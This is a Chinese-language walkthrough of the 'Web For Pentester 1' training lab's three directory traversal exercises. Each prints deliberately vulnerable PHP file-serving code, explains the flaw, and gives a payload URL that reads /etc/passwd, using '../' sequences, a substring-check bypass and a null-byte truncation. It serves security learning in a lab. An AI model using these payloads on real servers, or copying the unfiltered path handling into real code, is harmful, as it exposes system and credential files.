Web For Pentester1 -Directory traversal

Example 1

源码：

<?php

$UploadDir = '/var/www/files/';

if (!(isset($_GET['file'])))
die();

$file = $_GET['file'];

$path = $UploadDir . $file;

if (!is_file($path))
die();

header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($path) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($path));

$handle = fopen($path, 'rb');

do {
$data = fread($handle, 8192);
if (strlen($data) == 0) {
break;
}
echo($data);
} while (true);

fclose($handle);
exit();

?>

解释：默认以二进制显示头像hack.png,  $handle = fopen($path, 'rb'); 这里 path 变量没有进行任何过滤，导致可以通过../../../的形式造成目录穿越

payload：

http://10.10.202.152/dirtrav/example1.php?file=../../../etc/passwd

Example 2

源码：

<?php

if (!(isset($_GET['file'])))
die();

$file = $_GET['file'];

if (!(strstr($file,"/var/www/files/")))
die();

if (!is_file($file))
die();

header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($file) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($file));

$handle = fopen($file, 'rb');

do {
$data = fread($handle, 8192);
if (strlen($data) == 0) {
break;
}
echo($data);
} while (true);

fclose($handle);
exit();

?>

解释：这里检测了 file 参数必须含有 /var/www/files/，实际上并不影响我们使用 ../../进行目录穿越：

payload：

http://10.10.202.152/dirtrav/example2.php?file=/var/www/files/../../../etc/passwd

Example 3

源码：

<?php
$UploadDir = '/var/www/files/';

if (!(isset($_GET['file'])))
die();

$file = $_GET['file'];

$path = $UploadDir . $file.".png";
// Simulate null-byte issue that used to be in filesystem related functions in PHP
$path = preg_replace('/x00.*/',"",$path);

if (!is_file($path))
die();

header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($path) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($path));

$handle = fopen($path, 'rb');

do {
$data = fread($handle, 8192);
if (strlen($data) == 0) {
break;
}
echo($data);
} while (true);

fclose($handle);
exit();

?>

解释：

$path = $UploadDir . $file.".png"; 限制了读取的文件名为后缀是Png的类型，但是可以通过 00 截断来 Bypass PHP <= 5.3.4 版本，且魔术引号处于关闭状态的时候可以 00 截断成功。

$path = preg_replace('/x00.*/',"",$path); 正则表达式，x00.* 后面的都替换为空，刚好，%00.png 就可以全部替换掉了。

payload：

http://10.10.202.152/dirtrav/example3.php?file=../../../../../etc/passwd%00

OVER!